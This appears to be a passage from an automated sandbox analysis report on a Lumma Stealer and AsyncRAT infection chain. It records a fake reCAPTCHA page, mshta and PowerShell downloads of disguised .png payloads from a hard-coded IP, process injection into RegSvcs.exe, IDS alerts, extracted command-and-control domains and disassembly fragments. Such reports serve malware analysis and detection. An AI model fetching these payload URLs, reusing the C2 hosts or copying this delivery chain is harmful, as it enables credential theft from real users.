                  Source: Binary string: System.Core.pdbk source: powershell.exe, 00000004.00000002.58300790959.0000015E90C18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58451615184.0000025BAFF33000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58462627995.00000199FF720000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbL source: powershell.exe, 00000006.00000002.58452952666.0000025BB0288000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D20C18h11_2_00D209FA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov esi, edx14_2_00408740
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [ebx], cl14_2_0042E002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [ebx], cl14_2_0042E002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esi+04h], eax14_2_004161DF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+63115D0Dh]14_2_004251E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea eax, dword ptr [eax+eax*4]14_2_004082A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push eax14_2_00440310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov eax, dword ptr [00448B08h]14_2_004273A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+1Ch]14_2_004273A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea eax, dword ptr [esp+50h]14_2_004273A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax]14_2_00417451
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]14_2_00407400
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]14_2_00407400
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7E3E42A0h14_2_0043C410
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push esi14_2_0043C410
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al14_2_0042D420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]14_2_0042B430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [edi+eax]14_2_0042E5C2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esi+04h], eax14_2_004165EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]14_2_00415590
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov edx, ecx14_2_004095A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+48h]14_2_0041F710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-000000DEh]14_2_0041F710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh14_2_004427E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al14_2_0042E7EB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al14_2_0042F799
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h14_2_00429871
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax14_2_0042A810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp eax14_2_004288BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx esi, byte ptr [edx]14_2_00402940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+0Eh]14_2_0040A910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+32DBB3B0h]14_2_00427A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push dword ptr [esp+28h]14_2_00426A00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx+05CAF138h]14_2_0040BA29
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [edx]14_2_00438AF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [ebx], cx14_2_0041AA90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [esi], cx14_2_0041AA90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push 00000000h14_2_0040CB44
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+2564CAB9h]14_2_0043EB00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax14_2_00420B10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]14_2_0041DC40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h14_2_00415C25
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then add ebp, edi14_2_00408CD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [edi], cx14_2_00426D70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edx], cl14_2_0042DD30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esi+04h], eax14_2_00415E42
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [eax], cx14_2_00423E44
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h14_2_00413E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h14_2_0040DE72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+79h]14_2_00425E00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+63115D0Dh]14_2_00425E00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h14_2_0043EE10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al14_2_00408EB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]14_2_0041DEB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 13884179h14_2_0040DFEA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al14_2_0042DFAF

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2059189 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) : 192.168.11.20:50147 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2059203 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) : 192.168.11.20:62757 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2059209 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) : 192.168.11.20:63616 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2059211 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) : 192.168.11.20:49219 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2059201 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) : 192.168.11.20:53799 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2059199 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) : 192.168.11.20:50841 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 92.255.57.112:56001 -> 192.168.11.20:49774
                  Source: Network trafficSuricata IDS: 2059207 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) : 192.168.11.20:59050 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2059191 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) : 192.168.11.20:50505 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2059221 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curtainykeo .lat) : 192.168.11.20:64236 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.11.20:49773 -> 23.47.27.74:443
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: savorraiykj.lat
                  Source: Malware configuration extractorURLs: kickykiduz.lat
                  Source: Malware configuration extractorURLs: miniatureyu.lat
                  Source: Malware configuration extractorURLs: finickypwk.lat
                  Source: Malware configuration extractorURLs: washyceehsu.lat
                  Source: Malware configuration extractorURLs: curtainykeo.lat
                  Source: Malware configuration extractorURLs: leggelatez.lat
                  Source: Malware configuration extractorURLs: shoefeatthe.lat
                  Source: Malware configuration extractorURLs: bloodyswif.lat
                  Source: global trafficTCP traffic: 192.168.11.20:49774 -> 92.255.57.112:56001
                  Source: global trafficHTTP traffic detected: GET /1/1.png HTTP/1.1Host: 92.255.57.112Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1/2.png HTTP/1.1Host: 92.255.57.112Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1/3.png HTTP/1.1Host: 92.255.57.112Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 23.47.27.74 23.47.27.74
                  Source: Joe Sandbox ViewASN Name: TELSPRU TELSPRU
                  Source: Joe Sandbox ViewASN Name: TELSPRU TELSPRU
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49773 -> 23.47.27.74:443
                  Source: global trafficHTTP traffic detected: GET /recaptcha-verify.html HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: view-reserve.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: global trafficHTTP traffic detected: GET /recaptcha-verify.html HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: view-reserve.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: global trafficHTTP traffic detected: GET /1/1.png HTTP/1.1Host: 92.255.57.112Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1/2.png HTTP/1.1Host: 92.255.57.112Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1/3.png HTTP/1.1Host: 92.255.57.112Connection: Keep-Alive
                  Source: RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discover equals www.youtube.com (Youtube)
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C5914350094a33e2d53260db908a94a71; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=d2b040e0738eb66764a685b0; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25929Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 15 Jan 2025 09:18:42 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: view-reserve.com
                  Source: global trafficDNS traffic detected: DNS query: curtainykeo.lat
                  Source: global trafficDNS traffic detected: DNS query: bloodyswif.lat
                  Source: global trafficDNS traffic detected: DNS query: washyceehsu.lat
                  Source: global trafficDNS traffic detected: DNS query: leggelatez.lat
                  Source: global trafficDNS traffic detected: DNS query: miniatureyu.lat
                  Source: global trafficDNS traffic detected: DNS query: kickykiduz.lat
                  Source: global trafficDNS traffic detected: DNS query: savorraiykj.lat
                  Source: global trafficDNS traffic detected: DNS query: shoefeatthe.lat
                  Source: global trafficDNS traffic detected: DNS query: finickypwk.lat
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                  Source: powershell.exe, 00000004.00000002.58302816703.0000015E92ADA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97CEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.000001998022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.112
                  Source: powershell.exe, 00000004.00000002.58302816703.0000015E92D73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.112/1/1.png
                  Source: powershell.exe, 00000004.00000002.58302816703.0000015E92ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.112/1/1.pngXzi
                  Source: mshta.exe, 00000003.00000003.58288335780.00000250DC785000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58289154956.00000250DC789000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58288981238.00000250DC787000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58288807681.00000250DC786000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.112/1/1.pnghttp://92.255.57.112/1/2.png$TC=$TC.replace(
                  Source: powershell.exe, 00000006.00000002.58310832394.0000025B982BD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.58299585071.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.58297432343.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.58296660265.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.112/1/2.png
                  Source: powershell.exe, 00000006.00000002.58310832394.0000025B97CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.112/1/2.pngXzi
                  Source: powershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.112/1/2.pngin
                  Source: powershell.exe, 00000008.00000002.58451427929.00000199FD660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.112/1/3.png
                  Source: powershell.exe, 00000008.00000002.58308550972.000001998022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.112/1/3.pngXzi
                  Source: RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodo=
                  Source: powershell.exe, 00000000.00000002.58260917690.000002A3501FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287043720.00000250DC675000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.58305312624.00000250DC675000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283273648.00000250DC673000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.58382068499.0000015EAAC2F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58448102834.0000025BAFE64000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58457730531.00000199FF448000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.59532094818.00000000053E0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: powershell.exe, 00000000.00000002.58260917690.000002A35018B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287043720.00000250DC675000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.58305312624.00000250DC675000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283273648.00000250DC673000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.58382068499.0000015EAAC14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58448102834.0000025BAFE64000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58457730531.00000199FF448000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.59532094818.00000000053E0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: powershell.exe, 00000004.00000002.58382068499.0000015EAACB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micrd
                  Source: powershell.exe, 00000000.00000002.58260917690.000002A350242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.c
